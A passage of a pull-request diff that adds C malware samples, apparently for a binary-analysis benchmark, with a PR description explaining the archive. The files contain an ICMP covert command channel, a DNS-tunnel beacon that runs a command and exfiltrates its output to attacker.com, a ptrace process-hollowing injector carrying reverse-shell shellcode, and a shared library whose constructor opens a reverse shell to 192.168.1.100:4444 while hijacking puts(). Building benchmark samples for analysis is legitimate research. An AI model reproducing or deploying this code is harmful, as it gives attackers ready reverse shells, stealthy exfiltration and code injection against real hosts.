+    stage2_func();
+    
+    return 0;
+}

--- a/version2/samples/level6_ICMP Covert Channel Shell.c
+++ b/version2/samples/level6_ICMP Covert Channel Shell.c
@@ -1,0 +1,59 @@
+#include <stdio.h>
+#include <sys/socket.h>
+#include <netinet/ip_icmp.h>
+#include <netinet/ip.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <string.h>
+#include <stdlib.h>
+
+#define PACKET_SIZE 4096
+#define ICMP_ECHO 8
+#define ICMP_ECHOREPLY 0
+
+unsigned short checksum(unsigned short *buf, int nwords) {
+    unsigned long sum;
+    for(sum = 0; nwords > 0; nwords--)
+        sum += *buf++;
+    sum = (sum >> 16) + (sum & 0xffff);
+    sum += (sum >> 16);
+    return ~sum;
+}
+
+int main() {
+    int sock;
+    char packet[PACKET_SIZE];
+    struct iphdr *ip = (struct iphdr *)packet;
+    struct icmphdr *icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
+    struct sockaddr_in dest;
+    
+    sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
+    
+    dest.sin_family = AF_INET;
+    inet_pton(AF_INET, "192.168.1.100", &dest.sin_addr);
+    
+    while(1) {
+        memset(packet, 0, PACKET_SIZE);
+        
+        // Craft ICMP packet
+        icmp->type = ICMP_ECHO;
+        icmp->code = 0;
+        icmp->un.echo.id = getpid();
+        icmp->un.echo.sequence = 1;
+        icmp->checksum = 0;
+        
+        // Add hidden command in data section
+        char *data = packet + sizeof(struct iphdr) + sizeof(struct icmphdr);
+        strcpy(data, "whoami");
+        
+        int packet_len = sizeof(struct iphdr) + sizeof(struct icmphdr) + strlen(data);
+        icmp->checksum = checksum((unsigned short *)icmp, 
+            sizeof(struct icmphdr) + strlen(data));
+        
+        sendto(sock, packet, packet_len, 0, 
+               (struct sockaddr *)&dest, sizeof(dest));
+        sleep(5);
+    }
+    
+    return 0;
+}

--- a/version2/samples/level7_DNS_TunnelReverse Shell.c
+++ b/version2/samples/level7_DNS_TunnelReverse Shell.c
@@ -1,0 +1,49 @@
+#include <stdio.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <string.h>
+#include <stdlib.h>
+#include <netdb.h>
+
+void dns_exfiltrate(char *data) {
+    char query[256];
+    char encoded[128];
+    
+    // Simple encoding
+    for(int i = 0; data[i]; i++) {
+        sprintf(encoded + (i*2), "%02x", data[i]);
+    }
+    
+    snprintf(query, sizeof(query), "%s.%s.attacker.com", encoded, data);
+    gethostbyname(query);
+}
+
+int main() {
+    int sock;
+    struct sockaddr_in server;
+    char buffer[1024];
+    char command[256];
+    
+    while(1) {
+        // Beacon via DNS
+        dns_exfiltrate("beacon");
+        sleep(5);
+        
+        // Receive command via DNS TXT (simplified)
+        struct hostent *he = gethostbyname("cmd.attacker.com");
+        if(he) {
+            // Execute command
+            FILE *fp = popen("ls", "r");
+            char output[1024] = {0};
+            fread(output, 1, sizeof(output), fp);
+            pclose(fp);
+            
+            // Exfiltrate via DNS
+            dns_exfiltrate(output);
+        }
+    }
+    
+    return 0;
+}

--- a/version2/samples/level8_Process_hollowing_reverse_shell.c
+++ b/version2/samples/level8_Process_hollowing_reverse_shell.c
@@ -1,0 +1,55 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/ptrace.h>
+#include <sys/wait.h>
+#include <sys/user.h>
+
+void hollow_process() {
+    pid_t pid;
+    struct user_regs_struct regs;
+    
+    pid = fork();
+    
+    if(pid == 0) {
+        // Child process
+        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
+        execl("/bin/sleep", "sleep", "1000", NULL);
+    } else {
+        // Parent process
+        wait(NULL);
+        
+        // Get registers
+        ptrace(PTRACE_GETREGS, pid, NULL, &regs);
+        
+        // Shellcode for reverse shell
+        char shellcode[] = 
+            "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0"
+            "\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49"
+            "\x89\xc4\x48\x31\xc0\x50\x68\x7f\x00\x00\x01\x66\x68\x11\x5c"
+            "\x66\x6a\x02\x48\x31\xf6\x6a\x2a\x58\x48\x89\xe7\xb2\x10\x0f"
+            "\x05\x48\x31\xc0\x6a\x03\x5e\x48\xff\xce\x78\x0f\x6a\x21\x58"
+            "\x0f\x05\x75\xf6\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f"
+            "\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6"
+            "\x6a\x3b\x58\x0f\x05";
+        
+        // Write shellcode to process memory
+        for(int i = 0; i < sizeof(shellcode); i++) {
+            ptrace(PTRACE_POKETEXT, pid, regs.rip + i, 
+                   *(long *)(shellcode + i));
+        }
+        
+        // Set new entry point
+        regs.rip = regs.rip + 0x100;
+        ptrace(PTRACE_SETREGS, pid, NULL, &regs);
+        
+        // Resume execution
+        ptrace(PTRACE_DETACH, pid, NULL, NULL);
+    }
+}
+
+int main() {
+    hollow_process();
+    return 0;
+}

--- a/version2/samples/level9_SharedObjectInjectionReverseShell.c
+++ b/version2/samples/level9_SharedObjectInjectionReverseShell.c
@@ -1,0 +1,42 @@
+// reverse_shell_so.c - Compile as shared library
+// gcc -shared -fPIC reverse_shell_so.c -o libreverse.so
+
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <dlfcn.h>
+
+static void reverse_shell() __attribute__((constructor));
+
+void reverse_shell() {
+    int sock;
+    struct sockaddr_in server;
+    
+    // Don't run if certain env vars are present
+    if(getenv("LD_AUDIT") || getenv("LD_PRELOAD")) {
+        return;
+    }
+    
+    sock = socket(AF_INET, SOCK_STREAM, 0);
+    server.sin_family = AF_INET;
+    server.sin_port = htons(4444);
+    inet_pton(AF_INET, "192.168.1.100", &server.sin_addr);
+    
+    if(connect(sock, (struct sockaddr *)&server, sizeof(server)) == 0) {
+        dup2(sock, 0);
+        dup2(sock, 1);
+        dup2(sock, 2);
+        execve("/bin/sh", NULL, NULL);
+    }
+}
+
+// Hijack common function
+int puts(const char *str) {
+    int (*original_puts)(const char *);
+    original_puts = dlsym(RTLD_NEXT, "puts");
+    reverse_shell();
+    return original_puts(str);
+}


### PR DESCRIPTION
## Summary

- Add the 13 Level 1–13 C source files under `version2/samples/`.
- Update the Version 2 snapshot inventory in `version2/ANALYSIS.md`.

## Why

The frozen Version 2 directory preserved the benchmark analysis and model results, but not the source files used to build its binaries. This makes the Version 2 snapshot self-contained.

## Validation

- Confirmed all 13 files are present.
- Confirmed `version2/samples/` is byte-for-byte identical to the tracked root `samples/` directory.
- Scanned the staged source blobs for recognizable API-key and private-key signatures; none were found.
- Verified the documentation change is whitespace-clean.

The original source files contain pre-existing trailing whitespace, which is preserved intentionally so the archived copies remain byte-identical.
